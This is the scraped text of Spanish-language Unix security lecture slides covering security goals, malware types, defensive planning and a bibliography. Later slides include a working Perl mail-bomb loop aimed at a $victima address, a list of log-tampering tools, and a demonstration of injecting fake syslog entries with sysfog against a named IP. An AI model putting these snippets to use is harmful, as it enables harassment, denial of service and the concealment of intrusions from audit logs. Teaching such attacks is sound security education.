Contenido : Introducción Unix Básico Administración

1 Contenido : Introducción Unix Básico AdministraciónAdmi...
Author: Javier Molina Gil
0 downloads 2 Views

1 Contenido : Introducción Unix Básico AdministraciónAdministración Redes Configuración Internet Seguridad Configuración X Anexos

2 Seguridad del Sistema ComputacionalEdificio (Obra Civil) Instalaciones : Eléctricas / Sanitarias … Computador Hardware - Software (base/aplicación) Equipos Asociados terminales, impresoras, discos, cintas, cd-roms, modems … equipos de red (nic, hubs, routers, switches…). Medios de Transmisión cables (coax, fibra…) ... Data / Información-----> Information Sec.

3 Cual es más importante ??? Tipos de Seguridad ComputacionalConfidencialidad (Secrecy !!!) Integridad, exactitud, autenticidad Disponibilidad Cual es más importante ???

4 Como se garantizan ?? Confidencialidad / SecretoAcceso a información debe ser autorizado Secreto : ambientes militares Confidencialidad : ambientes comerciales planillas, contabilidad, memos internos, planes corporativos estratégicos Como se garantizan ??

5 En que tipo de entidades sera importante la exactitud ??Integridad Integridad, exactitud, autenticidad La informacion no debe ser modificada maliciosamente o no intencional Redes : identifica / autentifica En que tipo de entidades sera importante la exactitud ??

6 Ejemplos de negacion de servicio ??Disponibilidad Sistema e información disponibles para el usuario Hardware y software confiables Tiempo de recuperación del sistema mínimo Opuesto : ‘denial of service’ (negación de servicio Disponibilidad > confidencialidad/exactitud :) !! Ejemplos de negacion de servicio ?? AFI-0598

7 Otros tipos de ataque Virus Worm Trojan Horses Bombas de tiempoIP Bombing/ Mail Bombing Trap Doors Piggybacking

8 Virus Código que se copia a sí mismo en otro programaEs un programa dependiente Se activa cuando el programa ‘host’ se ejecuta Se replica a sí mismo e infecta otros programas

9 Virus Puede activarse inmediatamente o necesitar un ‘trigger’Pueden infectar memoria, floppy, disco duro u otro tipo de almacenamiento Invade otros programas y prolifera Degrada la performance del sistema Destruye data

10 Virus El contagio es por red, floppies infectados, software compartido, ... Generalmente ocurre en las PC-s En sistemas con DAC’s (ownerships y permisos...) es menos probable que proliferen

11 Worms Worms no destruyen dataAfectan funcionalmente al sistema (lento) Pueden generar ‘caidas’ (Unix) Necesitan un programa ‘host’ Pueden o no necesitar ‘triggers’

12 Caballos de Troya Programas independientes que parecieran cumplir una función y que en realidad pueden ser código malicioso, virus o worms. Spoof ? Password Grabber : Login : ?? No dejan rastro, no destruye data, pueden residir indefinidamente en el sistema y se puede autodestruir.

13 Bombas Tipo de Trojan HorsePuede activar un virus, worm o cualquier tipo de ataque Bombas : lógicas / tiempo Lógicas : a raíz de un evento .. copias no autorizadas Mail bombs : envio de mail no controlado Nukes : bombardeo de puertos ...

14 Trap doors / Puertas falsasMecanismo de ingreso al sistema, evitando la protección normal del sistema Generalmente es implementado por el autor del software Sysadmin debe ‘crear’ sus ‘back doors’ Servicios ‘no seguros’ ?? (Internet Worm)

15 Piggybacking Puerto establecida no se desactiva cuando termina la comunicación entre un usuario y otro sistema Otro usuario inicia la conexión y utiliza el mismo puerto con los permisos y autorizaciones del usuario anterior Ej. Telnet ...

16 Plan de Seguridad y AdministraciónTécnicas para prevenir/ corregir la pérdida de integridad de datos Backups Correctiva Técnicas en espejo Preventiva Archiving (archivado) Preventiva Custodia Correctiva Chequeo de paridad Preventiva/Correctiva Planificación de recuperacion Preventiva Análisis de Fallos Preventiva UPS Preventiva Impl. Técnicas segurid Preventiva

17 Plan de Seguridad y AdministraciónTécnicas para reducir la amenaza contra la seguridad Elim. Puertas traseras Sistema Chequeo de virus Sistema Seguridad Fisica Política Máquina desatendida Política Pol. Eliminación de basura Política Pol. Contraseñas Política Cifrado Sistema Oblig. Identificación Sistema Firewalls Sistema Trampas para intrusos Sistema

18 Entidades de SeguridadComputer Emergency Response Team CERT (www.cert.org) IEE Computer Society Internet Engineering Task Force IETF (www.ietf.org)

19 Entidades de SeguridadNational Computr Security Association NCSA (www.ncsa.com) RSA Data Security The WWW Security FAQ

20 Bibliografía Computer Security Basics Practical Unix SecurityRussell/Gangemi - O’Reilly & Assoc, Inc. Practical Unix Security Garfinkel/Spafford - O’Reilly & Assoc, Inc. Guia de Seguridad e Integridad de Datos Farley, Stearns y Hsu - osborne/McGraw-Hill Building Internet Firewalls Chapman/Zwicky - O’Reilly & Assoc, Inc

21 Bibliografía Internet Security Maximum Security - A Hacker’s GuideProfessional Reference / Atkins/Buis - New Riders Maximum Security - A Hacker’s Guide Anonymous - Sams Net Network Security Kaufman/Perlman/Speciner - Prentice Hall

22 Seguridad Accounting : lastcomm ac pacct Login : faillog / secure / messages Registros de actividad : syslog.conf

23 Seguridad /etc/issue.net (access por red)-(modif. rc.local) /etc/issue (para access por tty) (modif. rc.local) /etc/nologin ---> man 5 nologin touch .hushlogin ---> login silencioso :) /etc/securetty ---> lista de tty-s validos para root man 5 login

24 Seguridad pwck -r /etc/passwd pwck -r /etc/shadow revisar que el /homele pertenezca a root ?? topejer/security/tmp/Connect ---> chequear los tftpds... p.ej. hermes estaba con tftpd activo se connecta a toda la gama de ips detras de un ip dado (dns) y nos da una lista de aquellos que tienen el tftdp activo .. :)

25 e-mail bomb Re-envio de mensaje a un mismo receptor Acoso poco sutilProblemas : pago extra - en casos de costo x tráfico desperdicio de espacio en disco mal uso del ancho de banda puede degenerar en negación de servicio

26 e-mail bomb Implementaciones : Linux : #!/usr/bin/perl$mta='/usr/sbin/sendmail -v'; $veces=0; while ($veces < 500) { open(MAIL, "|$mta $victima") || die "Problemas con $mta\n"; print MAIL "UGH UGH\n"; close (MAIL); sleep 1; $veces++; } --> perl/bomb.pl

27 Manipulación de logs Ejemplos : cwho.c invi-vms.zip le.c (lastlogin.editor) logcloack.c logmarry.c wtmpedit.c

28 Manipulación de logs sysfog.c cc -o sysfog sysfog.c ógcc -o sysfog sysfog.c Uso : sysfog control-d Efecto : Uso de disco Negación de servicio Manipulación del syslog dir : security

29 Manipulación de logs sysfog.c En el 200.4.255.5 ./sysfog 200.4.255.5<2>System Crash <2>System Crashed :) control-d En el cd /var/adm # tail syslog Jul 31 20:20:04 hermes telnetd[23312]: refused connect from Jul 31 20:48:37 hermes telnetd[24068]: refused connect from Jul 31 21:37:24 pucp.edu.pe System Crash Jul 31 21:37:33 pucp.edu.pe System Crash Jul 31 21:37:46 pucp.edu.pe System Crashed :) dir : security